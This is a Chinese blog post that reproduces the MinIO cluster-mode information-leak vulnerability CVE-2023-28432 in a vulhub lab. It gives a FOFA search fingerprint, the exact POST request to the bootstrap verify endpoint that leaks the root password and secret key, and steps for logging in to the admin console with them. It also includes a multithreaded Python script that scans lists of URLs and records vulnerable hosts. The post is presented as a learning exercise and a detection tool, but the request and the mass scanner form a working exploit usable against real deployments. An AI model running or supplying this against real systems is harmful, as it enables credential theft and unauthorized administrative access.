MinIO集群模式信息泄露漏洞(CVE-2023-28432)

最新推荐文章于 2024-03-12 18:17:20 发布
最新推荐文章于 2024-03-12 18:17:20 发布
阅读量2.3k 收藏 21
点赞数 15
分类专栏: 安全 网络安全 文章标签: 安全 web安全 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2201_75756681/article/details/135246499
版权

引言

     MinIO是一个用Golang开发的基于Apache License v2.0开源协议的对象存储服务。虽然轻量,却拥有着不错的性能。它兼容亚马逊S3云存储服务接口,非常适合于存储大容量非结构化的数据。该漏洞会在前台泄露用户的账户和密码。

 

 

靶场搭建

 各位可以自行搭建vulnhub的靶场https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432icon-default.png?t=N7T8https://github.com/vulhub/vulhub/tree/master/minio/CVE-2023-28432,具体的搭建可以网上搜一下教程

 

Fofa指纹

#app="minio"

漏洞环境 

执行如下命令启动一个MinIO集群,其中包含3个以集群模式运行的服务:

docker-compose up -d

集群启动后,访问http://your-ip:9001可以查看Web管理页面,访问http://your-ip:9000是API服务。

 

 漏洞复现

这个漏洞存在于API节点http://your-ip:9000/minio/bootstrap/v1/verify上,发送如下数据包即可查看泄露的环境变量:

POST /minio/bootstrap/v1/verify HTTP/1.1
Host: your-ip:9000
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.5481.178 Safari/537.36
Connection: close
Cache-Control: max-age=0
Content-Type: application/x-www-form-urlencoded
Content-Length: 0

 

1、打开burp,把数据包复制进去

2、然后发一下包

 

 

 3、可以看到其中包含MINIO_SECRET_KEYMINIO_ROOT_PASSWORD这两个信息,这是账户信息

 

4、使用这个账号密码,即可成功登录管理后台:

 

相关poc 漏洞检测检测

import requests
import sys
import urllib3
from argparse import ArgumentParser
import threadpool
from urllib import parse
from time import time
import random
#app="minio"

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename = sys.argv[1]
url_list=[]

def get_ua():
	first_num = random.randint(55, 62)
	third_num = random.randint(0, 3200)
	fourth_num = random.randint(0, 140)
	os_type = [
		'(Windows NT 6.1; WOW64)', '(Windows NT 10.0; WOW64)',
		'(Macintosh; Intel Mac OS X 10_12_6)'
	]
	chrome_version = 'Chrome/{}.0.{}.{}'.format(first_num, third_num, fourth_num)

	ua = ' '.join(['Mozilla/5.0', random.choice(os_type), 'AppleWebKit/537.36',
				   '(KHTML, like Gecko)', chrome_version, 'Safari/537.36']
				  )
	return ua

proxies={'http': 'http://127.0.0.1:8080',
        'https': 'https://127.0.0.1:8080'}

def wirte_targets(vurl, filename):
	with open(filename, "a+") as f:
		f.write(vurl + "\n")

#poc
def check_url(url):
	url=parse.urlparse(url)
	hostname  = url.hostname
	url=url.scheme + '://' + url.netloc
	vulnurl=url + "/minio/bootstrap/v1/verify"
	headers = {
		'User-Agent': get_ua(),
		"host":hostname,
		"Content-Type": "application/x-www-form-urlencoded"
	}
	data=""
	try:
		res = requests.post(vulnurl, verify=False, allow_redirects=False, headers=headers,data=data ,timeout=5)
		if res.status_code == 200 and "MinioEn" in res.text:
			# print(res.text)
			print("\033[32m[+]{} is vulnerable\033[0m".format(url))
			wirte_targets(vulnurl,"vuln.txt")
		else:
			print("\033[34m[-]{} not vulnerable.\033[0m".format(url))
	except Exception as e:
		print("\033[34m[!]{} request false.\033[0m".format(url))
		pass

#多线程
def multithreading(url_list, pools=5):
	works = []
	for i in url_list:
		# works.append((func_params, None))
		works.append(i)
	# print(works)
	pool = threadpool.ThreadPool(pools)
	reqs = threadpool.makeRequests(check_url, works)
	[pool.putRequest(req) for req in reqs]
	pool.wait()


if __name__ == '__main__':
	arg=ArgumentParser(description='check_url By m2')
	arg.add_argument("-u",
						"--url",
						help="Target URL; Example:http://ip:port")
	arg.add_argument("-f",
						"--file",
						help="Target URL; Example:url.txt")
	args=arg.parse_args()
	url=args.url
	filename=args.file
	print("[+]任务开始.....")
	start=time()
	if url != None and filename == None:
		check_url(url)
	elif url == None and filename != None:
		for i in open(filename):
			i=i.replace('\n','')
			url_list.append(i)
		multithreading(url_list,10)
	end=time()
	print('任务完成,用时%ds.' %(end-start))

注:这就是个检测

python3 poc.py -u http://127.0.0.1:1111 单个url测试

python3 poc.py -f url.txt 批量检测

扫描结束后会在当前目录生成存在漏洞url的vuln.txt

小白在学习·
关注
  • 15
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
minio.RELEASE.2022-05-26T05-48-41Z
09-20
minio文件系统minio.RELEASE.2022-05-26T05-48-41Z资源包
CVE-2023-28432-MinIO集群模式信息泄露漏洞流量分析
12306小哥
07-12 680
MinIO是一个开源对象存储系统。在其版本(不含)以前,集群模式部署下存在一处信息泄露漏洞,攻击者可以通过发送一个POST数据包获取进程所有的环境变量,其中就包含账号密码和。
CVE-2023-28432 MinIO 信息泄露漏洞--漏洞复现10
qq_53058639的博客
02-03 922
微信公众号搜索:南风漏洞复现文库南风网络安全公众号首发MinIO是美国MinIO公司的一款开源的对象存储服务器, 是一款高性能、分布式的对象存储系统. 它是一款软件产品,可以100%的运行在标准硬件。即X86等低成本机器也能够很好的运行MinIOMinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息泄露信息中包含登录账号密码。
MinIO权限提升漏洞CVE-2024-24747详细解决办法
最新发布
yh
03-12 601
MinIO权限提升漏洞CVE-2024-24747 解决办法
CVE-2023-28432 MiniO信息泄露漏洞复现
Love&Share
04-28 5113
MiniO 是一个基于 Apache License v2.0 开源协议的对象存储服务。它兼容亚马逊 S3 云存储服务接口,非常适合于存储大容量非结构化的数据,例如图片、视频、日志文件、备份数据和容器/虚拟机镜像等在集群部署的 Minio 中,未授权的攻击者可发送恶意的 HTTP 请求来获取 Minio 环境变量中的敏感信息MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录 Minio,分布式部署的所有用户都会受到影响,单机用户没有影响。
MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)
qq_35476650的博客
03-24 5721
MinIO 是一种开源的对象存储服务,它兼容 Amazon S3 API,可以在私有云或公有云中使用。MinIO 是一种高性能、高可用性的分布式存储系统,它可以存储大量数据,并提供对数据的高速读写能力。MinIO 采用分布式架构,可以在多个节点上运行,从而实现数据的分布式存储和处理。MinIO verify接口存在敏感信息泄漏漏洞,攻击者通过构造特殊URL地址,读取系统敏感信息
vulhub之MinIO信息泄露漏洞(CVE-2023-28432)
薛定谔嘚喵博客
08-30 1466
MinIO中存在一处信息泄露漏洞,由于Minio集群进行信息交换的9000端口,在未经配置的情况下通过发送特殊HPPT请求进行未授权访问,进而导致MinIO对象存储的相关环境变量泄露,环境变量中包含密钥信息MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),能看到对应权限的存储文件。
MinIO信息泄露漏洞(CVE-2023-28432)批量检测POC
热门推荐
今天是几号的博客
03-28 1万+
MinIO 是一种开源对象存储服务,与 Amazon S3 API 兼容,可用于私有云或公共云。MinIO是一种高性能、高可用的分布式存储系统,可以存储大量数据,并提供高速的数据读写能力。MinIO采用分布式架构,可以在多个节点上运行,实现数据的分布式存储和处理。在集群部署的Minio中,未授权的攻击者可发送恶意的HTTP请求来获取Minio环境变量中的敏感信息MINIO_SECRET_KEY和MINIO_ROOT_PASSWORD),可能导致攻击者以管理员权限登录Minio
MinIO集群模式信息泄露漏洞CVE-2023-28432)vulhub漏洞复现
qq_53003652的博客
07-10 2245
利用泄露MINIO_ROOT_USER 和MINIO_ROOT_PASSWORD 值登录系统。可以查看Web管理页面,访问。启动burpsuite抓包。漏洞存在于API节点。
MinIO未授权SSRF漏洞复现(CVE-2021-21287)
isxiaole的博客
09-27 7544
MinIO 是一款基于Go语言发开的高性能、分布式的对象存储系统。由于MinIO组件中LoginSTS接口设计不当,导致存在服务器端请求伪造漏洞。攻击者可以通过构造URL来发起服务器端请求伪造攻击成功利用此漏洞的攻击者能够通过利用服务器上的功能来读取、更新内部资源或执行任意命令。
minio客户端-用于连接minio服务端-设置参数
04-19
通过minio客户端可连接minio服务器,配置路径的访问权限,不必登陆就能下载指定路径的静态资源
文件存储minio-RELEASE.2021-04-22T15-44-28Z历史老旧版本windows-linux下载
12-06
minio-RELEASE.2021-04-22T15-44-28Z,这是MinIO最后一个 Apache V2.0的版本,minio此后的版本都改为AGPLV3协议了,没法进行商业用途了。这个包包含minio-RELEASE.2021-04-22T15-44-28Z的windows二进制包,linux二进制包及源代码,可放心下载。
minio-RELEASE.2023-01-31T02-24-19Z版本
02-08
新版本配置 export MINIO_ROOT_USER=admin export MINIO_ROOT_PASSWORD=12345678 原旧版本中的配置是MINIO_ACCESS_KEY和MINIO_SECRET_KEY,请注意别在各博客中直接复制把自己的配置写错了,新下载的minio是用不了旧配置滴。
minio version RELEASE.2022-02-01T18-00-14Z (amd x64)
02-13
minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z minio version RELEASE.2022-02-01T18-00-14Z
漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞
m0_53121608的博客
07-16 2133
漏洞复现】CVE-2023-28432 MinIO集群模式信息泄露漏洞
MinIO漏洞 CVE-2023-28432
qq_38613494的博客
01-16 787
MinIO集群模式中存在一个信息泄露漏洞。攻击者可以利用该漏洞获取存储在MinIO中的敏感数据。等待文件迁移完毕后,可以关闭两个minio,将旧版minio的start.sh替换成新版的启动脚本,保持原本的端口。新版本的minio,根据情况设置bucket的作用范围为:public。
CVE-2023-28432
07-28
CVE-2023-28432是指MiniO验证接口敏感信息泄露漏洞。\[1\]根据引用\[2\]中的描述,该漏洞可能导致敏感信息泄露,其中包括MINIO_CERT_PASSWD等敏感信息。这意味着攻击者可能能够通过该漏洞获取到敏感信息。然而,根据引用\[3\]中的HTTP响应,我们无法确定该漏洞是否已被修复。因此,如果您正在使用MiniO,请确保及时更新到最新版本以修复该漏洞。 #### 引用[.reference_title] - *1* [Goby漏洞更新 | MinIO verify 接口敏感信息泄露漏洞CVE-2023-28432)](https://blog.csdn.net/m0_46699477/article/details/129742229)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] - *2* *3* [MinIO verify 接口敏感信息泄露漏洞分析(CVE-2023-28432)](https://blog.csdn.net/qq_35476650/article/details/129748849)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v91^control_2,239^v3^insert_chatgpt"}} ] [.reference_item] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值